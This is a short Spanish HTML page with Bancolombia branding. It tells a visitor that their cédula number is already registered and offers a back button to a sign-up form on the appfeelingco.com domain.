<!doctype html>
<html>

<head>
    <meta charset="utf-8">
    <title>Suscripción Incompleta</title>
    <link href="estilos.css" rel="stylesheet" type="text/css">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">

</head>

<body>
    <div class="text-center">
        <a href="index.html"><img src="img/Logo-Bancolombia.png" alt="" class="img-fluid" style="padding: 5%;"></a>
    </div>
    <div class="group">
        <form action="registro.php" method="POST">
            <h2><em>¡Suscripción Incompleta</em>!</h2>
            <p><em>El numero de cedula que usted ha proporcionado ha sido previamente registrada en nuestra base de datos.</em></p>

            <center><input class="form-btn" onClick="window.location.href='http://www.appfeelingco.com/bancolombia/formulario'" name="submit" type="button" value="Atrás" /></center>


        </form>
    </div>
</body>

</html>